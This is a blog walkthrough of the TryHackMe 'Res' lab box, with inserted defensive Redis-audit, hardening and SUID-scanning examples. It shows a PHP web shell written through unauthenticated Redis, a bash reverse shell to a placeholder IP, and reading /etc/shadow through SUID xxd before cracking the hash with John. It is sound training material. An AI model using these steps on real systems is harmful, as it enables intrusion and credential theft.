The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning through a question-and-answer approach. It's a comfortable way to learn using pre-designed courses which include virtual machines (VMs) hosted in the cloud.
TryHackMe Res Walkthrough
While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
Res is a new box on TryHackMe where you have to hack into a vulnerable database server with an in-memory data structure in this semi-guided challenge!
Let's start off by scanning all ports using Nmap:
┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$ sudo nmap -A -T4 -Pn -sV -p- 10.10.43.113
[sudo] password for hackerboy:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-26 23:32 IST
Nmap scan report for 10.10.43.113
Host is up (0.22s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
6379/tcp open redis Redis key-value store 6.0.7
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 2 hops
TRACEROUTE (using port 23/tcp)
HOP RTT ADDRESS
1 224.93 ms 10.8.0.1
2 225.08 ms 10.10.43.113
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 626.03 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$
Looking at the results, we have an Apache web server on port 80 and Redis 6.0.7, an in-memory data structure store, on port 6379.
Port 80: Apache Web Server:
Let's check out the web server on port 80:
OK, so we have the standard Apache landing page. Looking at the source code we can see nothing hidden. I ran a directory scan using Dirsearch to see whether I could find any hidden directories. Unfortunately, no hidden directories were found. Time to move on to port 6379 and enumerate Redis.
Redis is not something I am familiar with, so I spent some time Googling and found a good blog on enumerating Redis, which I follow below:
To start with we need to download redis-tools, so we can have access to redis-cli:
sudo apt-get install redis-tools
To start redis-tools, from the command line we enter:
redis-cli -h [IP ADDRESS]
By default Redis can be accessed without credentials. However, it can be configured to require a password only, or a username and password. In our case Redis can be accessed without any credentials. We can check this simply by entering the 'info' command.
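As an added example (not the post's own code), a small Python audit script that reports the two conditions this walkthrough's RCE depends on: the instance answering without credentials, and CONFIG being available to a remote client (its dump directory is also checked against a web-root prefix). Host, port and the /var/www prefix are assumptions.

```python
"""Audit a Redis endpoint for the two conditions this box relies on: replies without
credentials, and a CONFIG command that can be queried (and so repointed at a web root).
Added example for this walkthrough, not the post's code; host, port, prefix are assumed."""
import socket

WEB_ROOT_PREFIXES = ("/var/www",)  # assumption: a dump dir here is what made redis.php possible
VERDICTS = (  # first-line prefixes of Redis error replies and what each means for the audit
    (b"-NOAUTH", "auth-required"),                   # requirepass is set
    (b"-DENIED", "protected-mode"),                  # protected-mode refused a remote client
    (b"-ERR unknown command", "command-disabled"),   # command renamed away with rename-command
    (b"-", "error"),
)

def resp_encode(*args: str) -> bytes:
    """Encode a command as a RESP array, the wire format redis-cli speaks."""
    out = f"*{len(args)}\r\n".encode()
    for arg in args:
        raw = arg.encode()
        out += b"$%d\r\n%s\r\n" % (len(raw), raw)
    return out

def resp_bulk_strings(reply: bytes) -> list:
    """Extract the bulk strings from an array reply such as CONFIG GET's."""
    parts = reply.split(b"\r\n")
    return [parts[i + 1].decode(errors="replace")
            for i in range(len(parts) - 1) if parts[i].startswith(b"$")]

def classify(reply: bytes) -> str:
    """Map one raw reply to a verdict; anything that is not an error means 'open'."""
    first = reply.split(b"\r\n", 1)[0]
    return next((verdict for prefix, verdict in VERDICTS if first.startswith(prefix)), "open")

def assess(ping_reply: bytes, config_reply: bytes) -> dict:
    """Combine a PING reply and a CONFIG GET dir reply into findings."""
    findings = {"auth": classify(ping_reply), "config": classify(config_reply)}
    if findings["config"] == "open":
        values = resp_bulk_strings(config_reply)          # e.g. ['dir', '/var/www/html']
        findings["dir"] = values[1] if len(values) >= 2 else None
        findings["dir_in_web_root"] = bool(findings["dir"]) and findings["dir"].startswith(WEB_ROOT_PREFIXES)
    return findings

def audit(host: str, port: int = 6379, timeout: float = 3.0) -> dict:
    """Send two read-only commands to a live instance and assess the replies."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(resp_encode("PING"))
        ping = sock.recv(4096)
        sock.sendall(resp_encode("CONFIG", "GET", "dir"))
        cfg = sock.recv(4096)
    return assess(ping, cfg)
```

On a box configured like this one, audit() reports auth and config both "open" and dir_in_web_root True; a hardened instance reports "auth-required" or "command-disabled" instead.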
From the above we can see that we have a potential username: vianka. From the Hack Tricks website we can see that we can gain RCE as follows:
In firefox we can navigate to [IP-ADDRESS]/redis.php:
We can see that redis.php does indeed run phpinfo().
Let’s try this with another php script to run commands:
<?php system($_GET['cmd']); ?>
In redis-cli, we can simply overwrite the previous php file with this code and try RCE.
Let's see if we can print out the contents of the passwd file on the Linux machine; it is best to view the page with 'view-source:' to see the output:
And there we go, we have the full contents of the /etc/passwd file on the screen, and again we can see that we have a user vianka. All we need to do now is set up a listener and create a script to run a simple PHP reverse shell.
To do this I will do the same as above in redis-cli, but we will set test to run the following php reverse shell script.
"<?php exec("/bin/bash -c 'bash -i > /dev/tcp/YOUR_IP/4444 0>&1'"); ?>"
One important point here is that we will need to escape the double quotes inside the `set test "…"` argument, since they would otherwise terminate the string, so we will need to modify our shell code as follows:
To capture the reverse shell I will start a Pwncat listener, as it has a great deal of functionality, a bit like Meterpreter: we can easily upload and download files for further enumeration of the system, as well as run the built-in privesc scripts.
And we are in as user www-data. In the /home directory we can see user Vianka. Moving to Vianka’s home directory we can see that we have read access to the user.flag, so we can read the flag.
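For the defensive side of this box, an illustrative redis.conf fragment (added here, not the box's actual file) showing each weak setting the walkthrough relied on next to its hardened value; the password is a placeholder:

```conf
# Illustrative redis.conf fragment, not the box's own configuration.
# Each weak setting (commented out) is followed by the value that closes the path used above.

# bind 0.0.0.0              # weak: listens on every interface, reachable over the VPN
bind 127.0.0.1 ::1          # hardened: loopback only; put a firewall or stunnel in front for remote use

# protected-mode no         # weak: remote clients are served even with no password set
protected-mode yes          # hardened: refuses non-loopback clients while no password is configured

# requirepass ""            # weak: every client is trusted, so the 'info' check above just works
requirepass CHANGE-ME-long-random-secret   # placeholder; Redis 6 ACL users are the richer option

# (CONFIG, DEBUG, FLUSHALL enabled)        # weak: a client can change where the dump file is written
rename-command CONFIG ""    # hardened: no client can repoint dir/dbfilename at a web root
rename-command DEBUG ""
rename-command FLUSHALL ""

dir /var/lib/redis          # dump directory owned by the redis user, never a directory Apache serves
dbfilename dump.rdb
```

Running redis-server as an unprivileged redis user that cannot write under /var/www would on its own have stopped redis.php from ever landing in the web root.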
Wait here: basically I can't clear my terminal. If it's the same in your case, don't worry, we are here to resolve this issue. Simply type this command and you will be able to clear your terminal.
export TERM=xterm
To look for privilege-escalation candidates, we list all files with the SUID permission bit set using this command:
find / -perm -u=s -type f 2>/dev/null
The result shows a binary, xxd, with the SUID bit set and owned by root. We can probably exploit this to read a file with full root privileges. The go-to choice for Linux binary exploits is GTFOBins.
Unfortunately we do not have sudo rights, but looking at the GTFOBins entry we can read a file as root, since the binary has the SUID bit set. It may be possible to read the shadow file, extract the hash for user vianka, and then brute force the hash to get the password.
Using this technique we can print out the contents of the shadow file and copy Vianka's hash. If I can crack the hash using John, we can simply su to user vianka.
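The defender's counterpart to the find command above, as an added example (not the post's code): walk the filesystem, keep the root-owned SUID files, and flag any that is not on a known baseline, which is how an unexpected SUID xxd would be caught before a box like this is deployed. EXPECTED_SUID is an illustrative assumption, not a verified list.

```python
"""Baseline check for SUID binaries, the defender's side of find -perm -u=s -type f.
Added example for this walkthrough, not the post's code. EXPECTED_SUID is an
illustrative assumption; build the real baseline from a clean image of the same release."""
import os
import stat

# Assumed baseline of root-owned SUID files on a stock Ubuntu 16.04 host. xxd is not on
# it, and that is exactly the finding the walkthrough turns into a root-level file read.
EXPECTED_SUID = frozenset({
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6", "/bin/fusermount",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/pkexec",
})
PSEUDO_FS = ("/proc", "/sys", "/dev", "/run")   # no real binaries live here; skip them

def is_suid(mode: int) -> bool:
    """True for a regular file whose SUID bit is set (what find -perm -u=s -type f matches)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)

def scan_suid(root: str = "/", root_owned_only: bool = True):
    """Yield (path, owner uid) for every SUID file under root, without following symlinks."""
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        if any(dirpath == p or dirpath.startswith(p + "/") for p in PSEUDO_FS):
            dirnames[:] = []          # prune the walk below pseudo-filesystems
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)   # lstat: a symlink's own mode, not its target's
            except OSError:
                continue
            if is_suid(st.st_mode) and (st.st_uid == 0 or not root_owned_only):
                yield path, st.st_uid

def unexpected_suid(found, baseline=EXPECTED_SUID) -> list:
    """Return the SUID paths that are not on the baseline; each one needs a reason to exist."""
    return sorted(path for path, _uid in found if path not in baseline)

if __name__ == "__main__":
    for path in unexpected_suid(scan_suid("/")):
        print("unexpected SUID root binary:", path)
```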
Brute Forcing Vianka’s Hash with John:
To do this we need to create two files, one with the relevant line from the passwd file and one with the relevant line from the shadow file; we only need to copy and paste the entries for user vianka. We can then use the 'unshadow' command to combine them into a format that John can read.
echo "<vianka's line from /etc/passwd>" > local_passwd
echo "<vianka's line from /etc/shadow>" > local_shadow
unshadow local_passwd local_shadow > hash.txt
john --format=sha512crypt --wordlist=/home/hackerboy/Documents/rockyou.txt hash.txt
Now we have the password for user vianka, so we can simply run 'su vianka' to change to that user:
And there we have it, the root.txt file is there for the taking. I really enjoyed this box and it was good to learn about Redis, something I had not come across before.
Disclaimer
All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources; they do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or incite any illegal activity or hacking.
- Hacking Truth by Kumar Atul Jaiswal